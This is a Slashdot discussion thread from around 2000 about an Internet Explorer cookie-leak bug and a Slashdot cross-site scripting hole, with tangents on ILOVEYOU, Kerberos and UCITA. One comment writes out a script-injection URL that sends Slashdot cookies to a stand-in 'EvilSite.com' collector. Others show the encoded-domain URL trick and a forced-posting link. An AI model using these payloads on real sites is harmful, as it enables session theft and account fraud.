It's not open source... but it's cheap. And it does block cookies. When I try the test page, all I get is "Cookie blocked by InterMute".

I'm not 100% fond of the company... they have discontinued all versions except Windows. But if you're stuck using Windows -- I'm currently contracting for a Big Name PC manufacturer where non-MS OS'es are prohibited by company policy -- the control InterMute gives you is indispensible.

Hey, while you're at their site, ask them (nicely) to reinstate the UNIX and Mac versions. (The product is written in Java, so supporting these platforms should not be rocket science.)

Re:M$ caught in the cookie jar? again?!

[Alpha+State]

Junkbuster changes the user agent info to this because many exploits are browser-specific.

Re:I am gonna...

[mr3038]

I'm pretty sure you cannot fit entire spec in one cookie. Nice idea though.
_________________________

meaning?

[Danse]

So anyone can read the document and create an implementation without Microsoft's permission now? They don't have to illegally copy the document or anything. I'm curious to know how the situation stands right now.

Re:M$ caught in the cookie jar? again?!

[Marc+Slemko]

However, be sure to note that the only reason this stops this particular exploit is because the page is coded to check for the browser. If it wasn't, then simply sending a different User-Agent would be no protection at all.

The MS License ALLOWS posting on /.

[qnonsense]

Right. And it has this in the license:
...Microsoft grants to you the following...to reproduce and use a reasonable number of copies of the Specification in its entirety for the sole purpose of reviewing the Specification for security analysis...

Doesn't posting on Slashdot count as this????

Re:No big deal..

[G27+Radio]

That beats mine by a longshot. BTW, do you have any references so we know that you didn't keep our passwords? You da man.

numb

Especially sucks for Amazon customers...

[John_Booty]

I don't think this issue is "overblown". It's pretty serious! For example, Amazon has that patented "One-Click Checkout" feature, or whatever they call it. Basically, once you activate that feature, you can check out your purchases with one click. No need to enter your credit card or any other info.

Either the credit card info (and other info) is stored in your cookie, or the cookie simply stores a key that references all that info in Amazon's database.

The upshot is this: if someone copies your cookie, they'd have unrestricted access to your Amazon account... they could order stuff, change your customer info, etc. Whoa, that would suck!!!

Ahem!

[Anonymous+Elf]

If you don't want a paper or electronic trail of your purchases, don't give them your credit card! Use cash in a walk-in store or buy through an intermediary.

You're asking them to engage in a legal transaction then wipe all information of that transaction from their databases!?

Re:Ahem!

[Oarboat_7]

I'm asking them to make information (mostly just my credit card info) entirely inaccessable to anybody online in any fashion once I've made my purchase. It can be on machines not connected to the net, it can be on paper where necessary.

It shouldn't be behind a single password.

No big deal..

[drwiii]

I can do that with Netscape too.

Re:No big deal..

[jqs]

So this isn't an MS IE thing is it? Can someone post or direct us to the source for this exploit?

Re:No big deal..

[pudge]

You could, you know, tell us when you find a hole, so we could, you know, plug it up and stuff.

Re:No big deal..

[smurfi]

Ouch! I guess I'll have to take a hard look at my cookies file, to see who else stores my password in the cookie.

Hey, /., there is no need at all to store my password in the cookie. A random number, stored in my user record, will work just as well, and (even better) /. can change it periodically -- thus, any replay attacks stop working after a day or so.

Please fix that. Now. Thank you.

Re:No big deal..

[nevets]

Wow! I'm pretty impressed.

I had no idea about this little problem. But I still believe that the MS problem is much bigger, since you don't need the user to go to the site to get the cookie. It was pretty obvious that something was going on when I went to your site. But with IE you would have no idea that someone was stealing your cookies, unless you inspect all sites that have java script.

Still I'm impressed! You nailed both my user number and my password, Let those trolling comments of mine start pouring ;-)

(I believe you that you don't collect the data)


Steven Rostedt

Re:No big deal..

[SurfsUp]

Yes, I too am impressed and obviously these techniques are pretty common knowledge is certain circles. I'm not saying that wasn't very slick!

Ah, I'm sure he's trustworthy, but I changed my PW anyway :-)

I had already, by coicidence, taken the step of linking my cookies file to /dev/null a couple of days ago, and have since been reflecting on the desirability of being able to script my browser so I can set up a quick link to a site that requires cookies, with cookies enabled, then turn them off and delete the cookies as soon as I'm done. I guess I'll use Mozilla for that. Yet another reason why Mozilla is really cool.

Javascript is now off too. :-) Thanks for the clear demonstration. What a gaping security hole!

Java is still enabled over here, though. Until somebody demonstrates to me why that's a security risk too...
--

Re:No big deal..

[pod]

Ahh, this looks to be a slashdot specific exploit. It makes slashdot put your loginid and password in the url, and redirects back to the script thus transmitting the referrer.

It's actually en exploit discussed on CERT where a malicious web site can embed some script in a link to a cgi script, which in turn pastes it into the resulting page unaltered and the victim's browser executes it.

In this case the script is a bit of javascript that outputs your slashdot cookie via search.pl. All javascript enabled browsers are affected by this.

It's just a result of sloppy coding.

Re:ok, differentiate for me

[linatux]

The difference is that anyone (skilled enough) can fix linux problems. Only Microsoft can fix MS problems - if/when they get around to it.

Besides, bashing M$ is fun. Bashing the under-dog would be seen as cruel!

confirmed - works on the latest

[majcher]

I just tested the bug/hole on IE5 on Windows 2000, and it does indeed work there.

Re:uh, I think yes

[Erv+Walter]

Actually the article just says that you can't get to credit card info or other account maintenance things because you are asked to type a password. This is correct. However, if the user has set up one-click on the computer you stole the cookies from, you probably can one-click order stuff. There is no password required for one-click (just "one click"). It's all based on cookies. Of course, whatever you order will be shipped to the victim and not to you, but you'll still run up their credit card bill :(

Re:A potential sploit

[unDees]

So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"

Well, yeah, but all the stuff will go to the poor sap whose cookies you stole. Hey, you could order him lots of pr0nography and stuff--let 'im explain that to his significant other.

unDees

Re:A potential sploit

[GypC]

yep... that pretty much sums it up...

"Free your mind and your ass will follow"

OT MS & Kerberos (Re:This is pathetic.)

[acroyear]

Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED . That's why they are guarded so viciously.

So its no longer a trade secret. Its still a copyrighted document and is still protected as such.

OT .sigs (i.e. 3:30 on a Friday afternoon)

[Wah]

My .sig is my virtual t-shirt (and I'm a big t-shirt fan). I just try to keep it clean, anything else is fair game.

And I actually think that some of those sign up a friend deals may actually work..but it's gonna take a lot more surfing from a lot more monkeys before the things pay real money. And where is that advertising money coming from you ask? Hmmm, I'm thinking of older mediums....
--

Not if you use Opera web browser.

[FFFish]

It posts, but anonymously.

Rule of thumb: if you want security or privacy, do not use a Microsoft product.

--

Not true, you can't sue anyone

[WillAffleck]

Point of law -
Anyone CAN sue anyone.

Not true. In most Commonwealth countries, you can only sue the Crown (aka govt) if it lets you sue. I believe you can't sue the Supreme Court, Congress, the President, and the Senate unless they permit you to. There are certain exceptions to this rule, but in general, you can't sue certain portions of government or royal personages without their permission.

McAfee and UCITA

[Bourbon+Man]

Maybe someone should point out to these people who are pointing fingers at McAfee etc that under UCITA, there's no way they can do anything about it, even *if* McAfee was to blame, and even *if* McAfee knew the potential for this was there. They're just screwed. McAfee can just say, "Tough shit. Read the shrinkwrap license next time." Maybe then these idiot politicians would realize what UCITA is all about, and realize they are voting in legislation that can come back and bite them on the ass.

Re:Warning! This doesn't close the hole

[Wah]

hehe. What happened to you .sig?

(just a gentle jab :-)
--

Re:Fails on Mac IE 5

[j|m]

This is because Mac IE 5 is even stupider... It also recognizes that stuff as part of the domain, but actually tries to go to a domain by that name to fetch that page.
As in, when going to the malicious page (like
http://www.peacefire.org%2fsecurity%2fiecookies% 2fshowcookie.html%3F.something.com/)
it will try to connect to
www.peacefire.org%2fsecurity%2fiecookies%2fshowc ookie.html%3F.something.com:80
to fetch the page.

Geesh. This stuff is stupid!

Re:Didn't work for me.

[nevets]

Late reply, but I just noticed your response.

Actually, I was just stating that this works with IE 4 to show that it existed in previous versions. It was proven to work with IE 5 on Windows 98, but because of my firewall, and the way IE upgrades, I have yet to be able to get IE 5. So all I have to test with is IE 4.

I have never been one to say "It didn't work in this 'old' version". But this test was to state that it wasn't caused by any new features. It was there for a while, so if it was discovered before, it could have been exploited since then.

Steven Rostedt

TI-89 Also Affected

[MathJMendl]

Ok, I just tried Internet Explorer on my TI-89 and the same thing happened. I logged on to slashdot and had another TI-89 try to find its password by sending it packets and delaying the loading of the website, and it worked. I'm not even sure what to do now, as the unimaginable has happened. Hmm, I didn't even know that IE for the 89 had cookies.

Re:oh give me a break

[IntlHarvester]

You honestly believe that Linux program that you executed could not get your address book (grep) and send mail (mail)?

Thanks for the object example -- the Linux version of ILOVEYOU is coming sooner than anyone expects.
--

Re:And the paranoids rejoice!!

[aonifer]

Is it just me or do people find reasons to get all up and arms for nothing. For all of you how will respond that this is a big deal, remember your name/address AND phone number are all available in your local phone book.

Not if it's unlisted.

You could have really abused this by...

[Stephen+VanDahm]

...writing the PHP script so that it makes people's browsers post the following:

===================

Subject: Can You Imagine...
Body:

...a Beowulf Cluster of these?

Thank you.

===================

You would have earned a place in the annals of Slashdot history.

Take care,

Steve



========
Stephen C. VanDahm

Re:You could have really abused this by...

[G27+Radio]

You would have earned a place in the annals of Slashdot history.

That's OK. I now have the most active user-created sid in Slashdot history :)

numb

Re:You could have really abused this by...

[Zan+Thrax]

Probably. But don't be giving people ideas...

Re:You could have really abused this by...

[Black+Parrot]

> That's OK. I now have the most active user-created sid in Slashdot history :)

But can you make it mail itself to everyone in our address book?

--

Re:This is a Hoax!

[MathJMendl]

A hoax, huh? Have you actually tried the link? It found out products from Amazon related to what was in my cart..oops...did I say Amazon? I, uh, would never order from a place like that...

Re:Doesn't do anything on 2000

[smack_attack]

Just to confirm:
Windows 2000 is vulnerable.
I think it's safe to say that any windows platform is vulnerable... gee, I wonder why? Can anyone say: "windowsupdate.microsoft.com"?

Now I know why that damn window pops up letting me know it's "checking for updates".

What drwiii is doing is...

[Kimble]

...exactly what pod says above. However, since I started this before I saw his/her reply, I'll go ahead and post this as well. ;^) Go to the /. search box at the bottom of this page and type:

[script]alert("Hi mom!")[/script]

except use angle brackets instead of square brackets.

Since search.pl echoes what you type in "Searching blahblahblah" without stripping the JavaScript, you'll get an alertbox when you view the page.

drwiii's page works like that. That page redirects to something like this URL:

http://slashdot.org/search.pl?query=[script]loca tion.href = "http://EvilSite.com/cgi-bin/getcookies.pl?data=" + document.cookie;[/script]

(Actually, the "+" and perhaps the ";" would need to be changed to "%2B" and "%3B" in the URL.) EvilSite's CGI script receives /.'s cookie (in easy-to-parse, semicolon-separated name=value pairs) because the script was actually run from a /. page. (I truly don't mean to say that drwiii is evil in any way.)

Originally, drwiii's script used /.'s 404 page, which was optimized for people who accidentally made links like this. That loophole got closed after the server move.
--
New empires...began ebbing and flowing all over the place like Moon Pies on a hot sidewalk.

Warning! This doesn't close the hole

[Anonymous+Elf]

I hate to say this - big MSFT supporter I am - but the hack still worked even though I have EVERYTHING disabled. However, / is one of few sites I allow (thru Junkbuster) to get cookies. That is was the hack targets. AFAIK, if you want to avoid the hack you have to avoid the cookie. Manually login or make sure all your cookies are for trivial matters - like website preferences.

I'm using IE4 on NT4w/SP6 if that helps.

Lastly, the LAMENESS FILTER SUCKS - I have to type "Warning" instead of WARNING. OOG come save me.

Re:Warning! This doesn't close the hole

[Tower]

What really sucks about the lameness filter is that it still triggers that damned 70 second wait... so I can't just fix a few things and get on with things... I have to wait, and wait and wait...

oh well, the joys of reality in an abused public forum.

Re:And the paranoids rejoice!!

[stank]

What about all those nifty passwords that are stored as cookies?

what do I think?

[SEAL]

I think your post is a bunch of mindless ranting and highly overrated. I don't usually jump to Microsoft's defense but there is no way your post deserved a 5.

First of all, to the cookie issue: turn off Javascript, OR go into the security settings and disable cookies that are stored on your computer. OR wait a brief moment and Microsoft will have a patch out. OR use any number of 3rd party cookie filtering programs that are out there. Personally I think neither Netscape, nor IE provide sufficient cookie control and management capabilities.

Also, let's keep some perspective and remember that both IE and Netscape have had vulnerabilities uncovered. They both make mistakes, they both fix them. Let's move on.

As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't.

I DO think Microsoft should not allow their script language to poke through your address book. Newbie computer users would be less likely to trust this type of trojan if it wasn't a friend of theirs in the From: field.

The rest of your rant about the trade secrets and UCITA is nothing more than mindless Slashdot karma whoring. *yawn*

Best regards,

SEAL

Re:what do I think?

[gid]

sheesh, voice your opinion and you get marked down... whatever no sweat off my sack. and that's my point.... sorry that I forgot my

's and made my comment kinda unreadable and hid the intelligent stuff at the end of it ;)

---

Re:what do I think?

[SEAL]

Actually I don't care about the points as much as the effect they have. I like browsing with Highest scores first. If moderators consistently give points to mindless crap, then what's the use of doing that? With that said, though, my karma comment was merely directed at the off topic stuff that he tossed into his post, not the browser-related comments.

SEAL

Re:what do I think?

[carlos_benj]

"As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't."

You have to set an option to keep Outlook from automatically running .vbs files I believe. I don't think, for security's sake, that should even be an option.

carlos

Uh. Oh.. But IE wins handsdown over NetScape

[cOdEgUru]

Well..well..another Hole. Bad timing..I guess. Hope Microsoft would have a say in this. And I hope they do something about this soon, and not take a week before they release something. They have already too much s#%t on their hands now. But, if you were to think about it, Netscape had their fair amount of Security holes. IE is no different. I have been using both for the past three years. IE 3.0 was a dud..but from IE4.0 onwards I found it far far better than Netscape in terms of programmability and ease of use. I am sure there would be people here who would differ..but thats what I like about Slashdot. Finally, a discussion group which has people who dont bicker about small things, though I must say, we have an ego as well as the intellect which is double the size of the Bugs in Windows 2000. But then again, thats the first OS I ever had from MS which I never had to shut down for the last six months and never crashed on me.. Now thats gonna raise a debate again..but its true for me..and thats it. Anyway, IE is still far better than Netscape in terms of usability and programming on the MS platform, no matter how shitty it is. But I am sure Netscape is getting there. Lets all hope so. I hate sigs..so heres our website. For both MS and linux advocates alike. http://www.hackorama.com

My worst nightmares may become reality!

[gempabumi]

I can't help but think - what if someone grabs my cookie file and mails it to my mother? This is the worst thing to happen since the "History" list in the browsers ...

ahhhhhhhhck.

The real security blunder here is sites storing sensitive information in cookies. Idiot moves by microsoft should be anticipated, and _no_ sensitive information should be stored in cookies.

makes you wonder how long microsoft has been collecting cookies from other web sites ;)

g

Wish I could red the linked article

[Mr.+Slippery]

A bit offtopic...

While I don't run Windows or IE, I'm a security-conscious geek, and I'd like to warn my friends and co-workers about this expoit. But my employer of the moment, in order to protect us from evil content, has installed CyberPatrol. As you may know, the fine folks at Peacefire have been having a field day by pointing out the foolishness of censorship programs, and the makers of censorware have (at least in the case of CyberPatrol) responded by adding Peacefire to their blocklists.

So, all you companies with CyberPatrol installed - your censorship has just made it more difficult for your employees to be informed about a serious security hole.

Think of it as evolution in action.

Re:Wish I could red the linked article

[Tower]

Instead of filtering on that, just send off a note to the manager - that should get some attention.

"Bob, it seems you've been visiting freeteensex.com/natalieportman/members a lot these past few days. It's one of my favorite sites too, but damn it man! You don't even have a door on your cube! Think about the harassment suit the girls in the office could bring against us!"

wait.... that's not it...

Re:Wish I could red the linked article

[bcilfone]

I would quit my job immediately if my employer installed filtering software. For God's sake, why would an employer want to forbid their employees from educating themselves?

Some companies just need to get a clue.

WRONG!

[EricWright]

Did you get a copy of the ILOVEYOU email or attachment? Did you look at the source code? I did. I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING! It was a Visual Basic script. Those don't do anything by themselves. I have a copy of it on my HD, and all my jpgs and mp3s are just fine...

Go read the article you posted the link to. All references to ILOVEYOU are *COMPARISONS*.

They quite clearly state: "Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT..... This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus." They make no claims about ILOVEYOU spreading in this manner. They simply use the havoc-level of ILOVEYOU as a baseline for destructiveness.

The virus they are referring to in this case is the Kak virus.

Eric

Re:WRONG!

[SurfsUp]

I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING!

Good for you. May I politely point out that scripting host is enabled by default - how is a clueless user going to know to turn it off? Second, I did hear that if you have the preview window open the script will execute without any further help from the user. Ugly. Caveat: I don't normally run Windows, so I didn't check this.
--

Didn't work for me.

[pythas]

I'm at work, trying it with IE 5.0, on NT 4, and it wouldn't display any info for cookies that I have. Anyone else run into this?

Re:Didn't work for me.

[nevets]

Make sure you put a URL in that you have a cookie for. Like "slashdot.org".

I tried it with NT4SP3 IE4 and it worked. I usually do my browsing with Netscape on Linux, or Netscape on NT. But I had IE4 on my NT machine and started it up. I couldn't get it to work when it dawned on me that I don't browse with IE and had no cookies! So I started browsing a little, and went back, and sure enough it showed my cookies!

Steven Rostedt

Re:i'm impressed

[Oarboat_7]

I noticed, too, that it shunts around the JS code if it doesn't detect IE. Why was this necessary? Are they afraid Netscape would fall down and get hurt if it run the code?

That kind of "doctoring" of the demo code on the site only raises skepticism.

I am gonna...

[GNUs-Not-Good]

put the Kerberos spec from MS in my cookie file.

That way they will be responsible for distributing their own trade secrets through their own security holes.

Then, they can sue themselves.

Re:I am gonna...

[degroof]

Aw, ya beat me to it. (By only 3 minutes, though)

Comment removed

[account_deleted]

Comment removed based on user account deletion

How does this effect zones?

[e_n_d_o]

It would seem to me that determining the Web site that is producing a document is of paramount importance to a Web browser. Why is it that whatever MSIE component that determines the Web site that data is being received from hasn't been thoroughly tested for correctness? This isn't the first time MSIE has had problems here (remember the dotless IP address security zone problem?)

If it is determining the URL in this way, wouldn't this bug also effect IE's security "zones?" Is it also possible link to a document like this:

http://www.evilvirusinfestedhellhole.com?.comple telytrustedsite.com

and have that site operate with elevated security privileges?

I use this program under Windows to filter stuff

[Julz]

Unfortunately it's only Windoze but then Linux does have other tools although it would be nice to have the same tool/GUI on both platforms, anyone? Anyway Naviscope allows you to setup ad blocking and filter Javascript/ActiveX and cookies selectively by site/domain and within sites and it has a default for all sites not mentioned. On top of that it also does prefetching of links on pages, good if your using a flat rate connection, and can look for specific keywords for prefetching like "next" or "more" or "continue". I've found it very useful for the machine in the lounge which is used as a TV/Media/Games machine and yes it has both Linux and Windoze installed. Windoze gets used by vistors and girlfriend who are too used to Windoze

Proxomitron blocks with without killing JS

[Kris_J]

The default installation of Proxomitron disables this exploit without sacrificing the Javascript functionality needed to enjoy the majority of sites. Cool.

Re:A potential sploit

[Madoka+Ayukawa]

A similar discussion about borrowing cookies or embedding login and password information into the URL at various sites is at: http://talk.dvdtalk.com/ubb/Forum9/HTML/001232.htm l

It is a two-page thread about various topics belonging to privacy and how it can be violated or broken.

Re:fun with Amazon's One-Click Shopping (tm)

[Mija+Cat]

It was possible back in the DOS days because there were a limited KNOWABLE list of executables.

Take a look at c:\windows\ and its' tree sometime and tell me anybody could know that mess.

Meow

Re:And if Peacefire didn't report it to MS, then .

[Mija+Cat]

Point of law -
Anyone CAN sue anyone. This is why the American justice system is swamped, why judges are overbooked, and why there are too damn many landsharks (ahem, lawyers) out there.

I could, for instance, sue Microsoft for being a bunch of morons.
That case, like their case against Peacefire, would likely be tossed...provided the judge doesn't get swayed by PR...
Meow

Time to chime in. . .

[ksteck]

Ok, this topic is not the sole reason for my post. This is more like just an excuse to say the following: I am not so upset by this "yet-another-security-flaw-in-M$" notice as I am by the fact that our TAX DOLLARS go to buying countless computer systems with M$ OS and apps on them. Key computer systems vital to our national defence, security, and communication currently run this substandard OS. This should worry you. Mostly I'm just upset that vast amount of tax dollars spent related to M$ issues does not involve the actual purchase of the products, rather the administration costs. M$ products are so prone to problems the government has no option but throw manpower at the problem...which is very expensive. (hell you have to pay anyone with half a brain a ton of money just to ADMIT they know anything about M$ administration IMHO) I think I'll just have to finally start writing to the representatives in congress about this. Too long I've been saying, "Just one lonely letter won't matter..." gotta stop that train of thought. just speaking my $0.02, thanks for listening.

microsoft has released a patch...

[Dell+Brandstone]

The bug with the cookies is now mended in Microsoft's latest and greatest critical security update. (I think it's the 9th or so for NT5)

-DB

Re:oh give me a break

[ichthus]

Uh, no. Your C program could not email open my email program, read my address list, and email itself all over the planet. It could delete MP3s, JPGs, etc. if I owned them, but it couldn't delete those belonging to other users. And, it definitely could not replace executable programs with itself.

Rest assured, though, that if Linux EVER had a problem like this there would be a patch for it the next day.

Re:quick question

[G27+Radio]

After what I've seen today, I'm not about to click on that.

numb

Re:HOWTO Close up the scripting holes

[superkorn]

Open up your My Computer or any other folder. Go to the View menu. Click "folder options." Marvel at the fact that windows is probably hiding tons of files from you if you don't have it set to show hidden files. Anyway, click on the "file types" tab. Find "VBScript (.vbs)" in the list of file types. It will be set to run. Click on edit in the right side of the window there. Pick "edit" off the list of behaviors, then click "set default." Now just click ok a bunch of times and no more VB viruses for you...

How typical!

[kkeller]

This is simply another example of M$ trying to run Linux out of the market by strongarming web sites to target their web pages to Windows/ IE. Such a blatant demonstration of their monopoly power is further evidence that they must be broken up! Only with a breakup will such powerful features be available to non-MS users.

--keith

Re:HOWTO Close up the scripting holes

[amlai]

In Explorer(NOT I.E.), View|options|file types choose VBS Highlight "Edit" in the "Actions" Panel then click "Set Default"

Re:oh give me a break

[Cassandra]

Hmm if I compiled a C program for Linux and mailed it to a Linux user, couldn't the same thing happen if he/she ran it? Where's the patch??????

You can't just double click the attachment to run it, or can you? At least I can't do that. If you have to save it, then run it you will have some more time to think, and you will definitely know that you are executing a program by then. As someone pointed out here earlier, the executable extension (.exe) is hidden by default in Wxx, so you might not even know that you are executing a binary if the file is called niftypicture.gif.exe or similar.

MS Contradictions

[LordSkippy]

What I find interesting is that this bug doesn't appear in the http header support for cookies. This means the http header group and the JavaScript group used different approaches and code to the same problem.

Why is that interesting? Because, MS is arguing that consumers need MS to remain one company so the OS side and software side can work close together and provide us with more powerful software, and breaking them up would stiffle "innovations" in future products - resulting in less powerful and less user-friendly tools for consumers.

MS expects people to believe that, when they can't even effectively share algorithms, programming procedures, and code within the same software product?

MS = BS;

Re:HOWTO Close up the scripting holes

[jchristl]

HowTo turn-off scripting holes in outlook/IE -------------------------------------------- In Add/Remove Programs, select Microsoft Outlook. Click the Add/Remove button. After it uninstalls, then Install a different Email client, preferably Pegasus Email. Joe

Oh no!!

[EddieLawhead]

I've been storing a certain trade secret in my browser which was made by the same company that a new trade secret came from. I guess I just thought that the company's own software would be the best place to store such important information.

I guess I'll have to delete that cookie, but where the heck am I going to store this important trade secret now?

What am I going to do?? I'm so confused.


Check Out Knexa.Com

Other solutions...

[angramainyu]

I'm running IDcide, and it seems to block access to the cookies. I'd also recommend JunkBuster for those who like to browse sites that need javascript, but want to protect their privacy.

Re: How do you turn off Javascript in MSIE?

[knuth]

1. View
2. Internet Options
3. Security (tab)
4. "Zone" probably says "Internet zone". That's fine.
5. Check the radio button at the bottom for "Custom".
6. Use the Settings button.
7. Scroll wayyyyy down. Last set of radio buttons, for Scripting/Active Scripting.
8. Disable.
9. OK.
10. OK.

Microsoft innovation in action again. Like "friendly URLs". Furrfu. They couldn't call it JavaScript, noooooo... they had to give it a cutesy obscure name.

Windows 2000 is affected as well

[tk]

Windows 2000 is affected as well, of course.

-tk

UNIX _IS_ affected

[cpeterso]

"effect" is a noun. "affect" is a verb. UNIX is affected.

Re:UNIX _IS_ affected

[Tower]

>effect is also a transitive verb
>check the dictionary, it seems to say your troll is misguided and archaic.

nope, actually - 'effected' has a totally different meaning, even as a verb.

He effected the change, but the change affected her.

He caused the change, the change did not cause her, and was not caused by her, it just happened to alter circumstances that she cared about.

Not the same at all.

Affect as a noun (emphasis on the other syllable) relates more to mood. 'She has a flattened affect due to her use of meth years earlier' is one of the more popular uses. Killing off of dopamine receptors, that sort of thing.

Again - Not the same at all.

And the paranoids will survive

[Camel+Pilot]

As was pointed out a lot of sites use cookie to maintain session. Therefore if I can steal the session ID for lets say Amazon I could send you $20000 dollars of books as a joke. That is not funny.

This hole depreciates the value of "Netscape" cookies which is a nice way to maintain session with a connectionless protocol.

Kerberos in a Cookie?

[degroof]

So, is it a violation of the Digital Millennium Copyright Act to place the entire text of Microsoft's Kerberos extensions spec in a cookie that is available only to microsoft.com? Assuming that you are in rightful posession of the spec and since cookies are supposed to be private and reasonably secure, it would seem that you've taken precautions to protect their confidential information. The fact that a bug in IE allows everyone and his dog to view anyone's cookies can't be construed as negligence on your part, can it?

Re:Asking for Trouble

"Is this Slashdot slowdown just a coincidence? I think not. Slashdot is now the victim of an official Microsoft Denial of Service Attack. "

What do you call a Denial of Service Attack from Microsoft?
an MS-DOS attack :o(

Re:IDcide fix?

[BLiP2]

I'm using IDcide on IE 4 in win98. With it "enabled" none of the sites work. Once I click on "disable IDcide" from the hat menu, I can retrieve some of my cookie file.

Re:It's all DOJ's fault

[Oarboat_7]

Wow, you sure have a low opinion of all the non-Microsoft software on the 'net. Do you really think the DOJ is the only thing saving poor little us from Big Bad Microsoft?

NT4 as well

[barzok]

NT4, SP5, IE5 it works.

And the paranoids rejoice!!

[Sasquach]

Oh GOSH. Now they have the fake name/address/e-mail I always put on stupid registrations. So let Bob Gobman at 1 Happy St. get all the junk mail destined for me. And let the unfortuneate fellow whos e-mail is bob@bob.bob get all the spam destined for me.

Is it just me or do people find reasons to get all up and arms for nothing. For all of you how will respond that this is a big deal, remember your name/address AND phone number are all available in your local phone book. And if you are THAT paranoid about common public information, the DON'T POST YOUR REAL DATA!!!

Re:And the paranoids rejoice!!

[Oarboat_7]

Personally, it pisses me off that eCommerce sites insist on me establishing an 'account' on their server, and a password to access my Credit Card #, etc. that they've tucked away on their site.

I don't want them keeping my information any longer than it takes to process and ship my order.

On the one occasion when I made the mistake of ordering from Amazon.com, I tried shortly thereafter to get them to delete all information about me. They responded with all sorts of questions (details of the order I had placed), basically refusing to delete the info unless I provided it.

At least they don't spam me anymore.

I don't believe this...

[ccoakley]

This can't be true. The man who sold me my computer said that Windows 2000 would make surfing the internet safer and faster than ever before. He also said that using the email with Wondows 2000 would be safe. First the lovebug and now cookie thieves! I think you people just make this stuff up.

Macintosh users, beware...

[debugdave]

...this bug also affects IE5 for the Macintosh. So fellow Mac users, don't think we are'nt touched my Microsofts stupidity...because we are.

just thought y'all should know

djsw

This is pathetic.

[qnonsense]

I am shocked. This is pathetic.

If I were the Justice Department (or United Nations, or DoD, or CIA, or FBI, or ANYONE who gave a damn about security ) I would be seriously considering if Microsoft products have any place on my desk, in my office or in my life. The open cookie jar isn't so much what bothers me but this is the straw that brakes this camel's back.

Microsoft's attitude toward security and toward the end user in general is atrocious. I don't really care what you think, but it IS Microsoft's fault that the default install of Windows 98 using the default mail client simply by reading the ILOVEYOU message will be rendered useless. Now this???? I mean COME ON!

Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED . That's why they are guarded so viciously.

Oh, and another thing which is completely offtopic: I think that the UCTIA, Section 307, Subsection 2(e) invalidates the GPL!!! It is a description of what kinds of software licenses are valid. It reads "(e) Neither party is entitled to receive copies of source code, schematics, master copy, design material, or other information used by the other party in creating, developing, or implementing the information."
This would seem to mean that no one needs return code as the GPL demands. What do you guys think???

The other problem

[G27+Radio]

I mentioned this yesterday in the Hotmail thread but it kinda got lost in the shuffle. Slashdot should post an article about the "client-side trojans" discussion that is going on at Zope. Slashdot isn't the only site affected by this--and it's a simple hack:

WARNING: Clicking this link will cause an article to be posted on Slashdot in your name

Obviously such a link wouldn't need to warn you what is does, or post such an innocuous message. Maybe I could make it post you slashdot cookies to o :)

You can see the results in sid=numb and there is a link to the source in there too.

numb

Re:The other problem

[G27+Radio]

Hot damn...gotta like being one of the Anonymous Cowards in that sid. Is anyone else concerned by the sheer number of people that went ahead and clicked it? Aren't you people the ones that are always crowing about how much smarter you are than the average "luser"? Everyone just believed that all that script would do is post a comment, just like a bunch of idiots believed that someone at Dow Jones sent them love letters.

All it did was post a comment. Theres a link to the source at sid=numb. It could have done worse though if I had added the javascript thing (provided you use Windows and IE.) As for clicking links no one is safe (unless they have redirection disabled.) I could e-mail a similar link and have it look completely benign, yet have it post something incredibly embarrassing.

BTW, to find out more about it click here.

or just go to http://www.kuro5hin.org/?op=displaystory&sid=2000/ 5/9/183550/1910 if you don't trust the link :)

One other thing, I used a PHP script because Slashdot's software recognizes duplicate posts and I needed to make the content dynamic. However, for a targeted attack plain old HTML on a geocities web page would do the trick.

numb

numb

Re:The other problem

[Black+Parrot]

> WARNING: Clicking this link will cause an article to be posted on Slashdot in your name

Think how mad someone would be if all those 300+ posts (so far) had been copies of a certain "trade secret" that has been mentioned here lately.

--

Virtual hosting and other problems for Apache

[jonathanclark]

I noticed this exploit causes problem with Apache as well. This could possibly cause a security hole somewhere :

when I specify a URL like this:

http://www.somewhere.com/test.php3?q=8

apache correctly reports:

"Host: www.somewhere.com"

but when I specify a URL like this:

http://www.somewhere.com%2ftest.php3%3fq=8

apache reports:

"Host: www.somewhere.com/jc/test.php3?q=8"

This means apache is confused on what host you are trying to reach and virtual hosting will resort to the default hostname. I confirmed this on my web server.

But... for some reason the cookie exploit doesn't work for me. I tried it on w2k and IE 5.

Never using IE again!!!!!

[JohnT]

I used to use NS but I switched to IE b/c that was what everyone was using, but not anymore. Bring on Netscape 5 . . . er 6!

Other options

[sonnerbob]

Hadn't heard of Proxomitron before. Thanks.

Other options:

1. Use another browser. I recommend Opera.
   
2. Install IDcide. Seems to work for me.
   
3. Use a "cookie managing" anonymizer like PrivadaProxy or Freedom. They aren't free...I prefer Freedom...and not just because the link includes my affiliate ID :-)
   
4. Use a "cookie managing" Web-based proxy. If you are going to surf promiscuously (whatever that means) where this exploit might rear its head, you can use The Cloak which is distinguished from Anonymizer et. al. in that it caches cookies remotely. Bandwidth limiting and you have to remember to use it, but it's free of charge.
   
5. Live with it until the fix is in.

   A proxy comparison chart
   

It's the cookies, stupid

[Anonymous+Elf]

Sorry, but disabling javascript doesn't do JACK to fix the problem (I've got everything else disabled too - paste, activex, all java, EVERYTHING).

The only way to solve the problem on my platform so far (IE4, NT4) is to disallow / from receiving cookies (via Junkbuster).

That is unfortunate because it is impossible to login without cookies. Perhaps / needs to revisit its cookie use policy. They ARE evil.

I finally "register" and create an account only to find one more reason why AC's are absolutely right.

HOWTO Close up the scripting holes

[xDroid]

HowTo turn-off scripting holes in outlook/IE.
------------------------------------------
In outlook/IE,

